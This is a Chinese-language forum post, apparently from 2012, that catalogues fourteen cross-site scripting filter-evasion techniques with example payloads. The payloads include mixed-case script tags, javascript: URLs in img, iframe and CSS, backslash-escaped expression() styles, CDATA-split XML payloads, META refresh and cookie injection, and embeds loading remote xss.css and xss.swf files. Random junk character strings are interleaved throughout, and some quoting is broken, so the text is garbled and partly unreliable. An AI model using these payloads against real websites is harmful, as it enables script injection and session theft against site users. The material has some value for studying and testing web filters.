1. 改变字符大小写: r0 }& p! k/ C* E) ^; m
, V8 ~7 z' V w7 f7 K0 @+ C0 Y+ u1 S+ ] 9 l, m4 x x' X- e; d7 e* R9 ?# i
" A" I1 G3 B2 Y( q+ J
<sCript>alert(‘d’)</scRipT>
' H+ I1 g9 O; c1 \2 n& T
# h$ O) _" p9 u# a* U) k$ z! Z9 B2. 利用多加一些其它字符来规避Regular Expression的检查
2 v) u$ i5 O+ X; d) t7 q, k0 U: I5 U+ z8 y: ]5 @
<<script>alert(‘c’)//<</script>, O; n# ?1 }: j# k% s
4 N& S& L, Q& w! G7 u* Y Y+ N+ k, c <SCRIPT a=">" SRC="t.js"></SCRIPT>
8 i0 Y0 I5 Y. K& {
/ O" z& N# _/ N, U# t <SCRIPT =">" SRC="t.js"></SCRIPT>" Y i7 K$ @% J+ B5 l9 S
3 ]8 u. a9 `0 k" H <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
5 F% K% a5 ~& J3 b
4 B* N; M) i2 ]+ [7 X6 u <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
7 c2 T& n. @7 _, G0 K! i4 g# f/ r' W R+ M6 H Y- d/ l
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
8 r7 ^& c { K [5 K: G8 p# E( R$ Q+ H% z9 |
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>+ j4 G2 R' K: O& E1 G
& p) v; x* k' M& ?9 o
3. 以其它扩展名取代.js
( r8 q' x! Q R6 H" F5 g1 ^5 ~6 z3 u, x7 S; O3 ?3 T
<script src="bad.jpg"></script>
9 Q# s, j& m) P$ B* b$ r+ W- J3 t* A ^
. i- R5 {7 g+ n) r* n4. 将Javascript写在CSS档里8 H7 A7 K( d/ G! J9 z8 L
# ~# x1 F- S/ m" \ <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">; z. e$ L9 K$ e8 J" n
8 z9 v/ P- n8 A# j* O
example:
2 y$ t1 U2 g' `/ T% G: ~ N1 M* @1 o- G2 }" ?
body {) W+ T& Z0 y$ Z# @/ M2 g
' V2 u! l# g+ s
background-image: url(‘javascript:alert("XSS");’)
- g' [5 t* O5 v9 ]0 ^- |7 ?# P" g) c2 R7 m% l {( P/ z j# W5 Q) ~
}
0 a+ H, R" B+ N& e0 l$ t! h5 b
5 { ~" P. [' I0 P8 Q5. 在script的tag里加入一些其它字符8 M* r% P6 M& O, G5 h: ~% A
8 S9 e8 m" ^3 \3 c6 d+ A
<SCRIPT/SRC="t.js"></SCRIPT>2 E8 l/ S: u' A- X
8 r+ F/ E3 a! U$ @. s4 h0 d6 a <SCRIPT/anyword SRC="t.js"></SCRIPT>
% F7 A9 I9 l% }! _. ?; h& j$ [8 w. J9 z
6. 使用tab或是new line来规避4 e# O- N j% e M% t5 C- S
) F& g- ?1 E, p1 ~
<img src="jav ascr ipt:alert(‘XSS3′)">( Z( y8 h8 Q! j! I5 Q. f$ o
, ]8 U9 m ~( M" b0 S( j" B
<img src="jav ascr ipt:alert(‘XSS3′)">
" h$ a8 T; [* F" A1 s: R+ Z
3 V/ u1 l; j% [. _8 F8 Y7 Q <IMG SRC="jav ascript:alert(‘XSS’);">0 d" z# S3 P6 z4 R3 ^
7 W! E, o% u8 [7 [ -> tag
" p7 A# c* }. L& e5 u6 P- P( a+ }! j6 |! N; G# L
-> new line
4 l: `- v% q7 K4 S$ H) A8 L& z6 M/ N, Y- ?7 b) C3 w
7. 使用"\"来规避, `. W. W7 r( u, T6 e$ D
+ O' |- }! P( W- Z' n, Q: L
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>& u B) U! F4 }# s
) c+ V' h: Y" L8 l: k j) O; G
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
- R+ X6 p8 i$ t% X
% }. W3 `8 L6 G <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
( L: p/ f |; ^# c- K' ~5 P4 x
8 ?6 G: N$ ]6 |7 b | <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
( m1 R% q0 O/ j6 W D8 a2 e+ w
4 Q2 K7 _3 e4 r. ?5 J8 S <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’># Z s1 F. q4 C) Q$ ^' s
# Q9 l! w' J' z; y/ b) N6 K# E; W8. 使用Hex encode来规避(也可能会把";"拿掉)
* Y6 T# }6 t( V
* a5 s1 @/ n; V3 S8 j" h <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">) `* S, k0 n4 f3 Z' P
. f' a% ~" }* O9 P( `+ l: a
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
6 V+ @( M6 O) z4 |: N, b
9 V' n" h+ A( f+ g. m <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
! J- P' J% o% O, J
' e6 Z8 P3 W) }* A x3 u: _ 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">/ R( B: c3 K Z3 @& s
1 d& a- E/ O; I6 j
9. script in HTML tag
h; K+ r1 o: C; W- y8 |/ W$ w8 D) g( i& ~7 [$ Q( G
<body onload=」alert(‘onload’)」>
" u) j5 C, A0 S& |" @, P: ~; g: ]1 a/ ~0 i" z. E" |" Y* i
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload4 m: o/ @; }4 p8 [5 w+ `
: e' ]- E/ q n: x. u( d6 W10. 在swf里含有xss的code
8 I+ q3 c+ O( g* t$ x; D3 P1 A) K) H& L9 o- s
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>( u; ^* t0 V6 n' C7 T" s* u3 q
3 [9 C: h6 R# \& ?
11. 利用CDATA将xss的code拆开,再组合起来。4 |( L0 f0 ?/ P9 b
4 w) }9 W, z R2 q! q, F _
<XML ID=I><X><C>, |4 `1 M* }9 P+ L* V$ Q Z; B$ b
7 a9 N2 X0 k9 X% i" B0 ?% e4 J3 k <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>, D8 j+ I% Y: M2 w& U; [9 O
0 c+ q1 b- R3 k9 K6 Y9 I; Q
</C></X>4 q v8 T7 L% ]: m, \$ d# h
! ^7 x0 _$ S2 e; w& H* F) Y </xml>1 v) m8 S z, O- n3 a( i
6 _4 l! ]1 ^9 x# ]6 k
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
7 M) {0 }$ X* M
$ s( V" G5 x4 H8 K1 R8 d- U. j <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>& y; X5 ~+ r Q% m% s; g; C
8 U( K0 N/ g9 A, ~ <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>: N! ~6 J8 G/ d3 c0 W- ]6 \4 h
$ z- {% a( x5 R& ^. \
12. 利用HTML+TIME。
( [8 |# \1 k' d: `% M d1 {2 N. e0 u( t6 o! q5 W4 A1 P
<HTML><BODY>6 Q" T4 }2 c9 y3 r! K
; D; {' z1 F6 R/ \# c3 e <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">: t; L& x" A- i0 Z" F: N" b: X
: ^5 _, m: {4 G% v* e0 d( r <?import namespace="t" implementation="#default#time2">
5 `& U+ n" ^: B C4 Q! E) |" O+ m! S! @
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
, q F3 ?- L4 K+ Z) O, {5 m* {/ b" Z" f% _6 B
</BODY></HTML>
7 o# D7 c' b+ P3 s
9 D$ n. l9 j8 S9 v13. 透过META写入Cookie。+ W- s0 b" k* x5 O
9 Q0 w7 n, ^" u! O' A- a# Y0 _ <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
( i+ [2 W9 t0 g" w0 r- V$ f
/ _% T0 x/ |+ r+ J% |14. javascript in src , href , url3 Y2 m; C$ ?# L7 e( I) {- t
- r+ |) h! c) h0 f <IFRAME SRC=javascript:alert(’13′)></IFRAME>
3 R- B1 O Q! ^1 E0 E" G0 ~7 y1 W4 p
<img src="javascript:alert(‘XSS3′)">
2 }3 u' p# X ^8 W
' x$ a# F4 a( L9 @<IMG DYNSRC="javascript:alert(‘XSS20′)">. R7 z0 C4 j! \
8 N8 d* }1 Q2 h. _ <IMG LOWSRC="javascript:alert(‘XSS21′)">/ m9 B. J3 H7 a0 w6 i
4 I! j% v" }& F( x
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
) I) u* }( s, q0 w
- |" H1 r, R$ Z4 x( k <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
+ d$ ?- _9 _( _" t' B, v- R
5 j4 }4 M X. {" [8 b2 _. q t7 { <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
: C I+ W' F% ?2 E6 A
2 |' r1 J* W. l3 @ <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
7 `4 B/ t/ v- d5 h1 Z
7 z; v0 w* ]/ c- n. _" E <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}* G8 f! O+ U. B/ g8 Y$ Z
5 a3 s" g- v/ z0 G% O# N </STYLE><A CLASS=XSS></A>+ j, q) q0 A# ]& g4 r- B
M1 |+ f9 O; l* K& p; M <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
' v. U: R0 Z j1 ]0 Q5 m( h) W; f3 Z N4 ?8 D# U/ Q
|
发表于 2012-12-31 09:59:28
收藏
支持
反对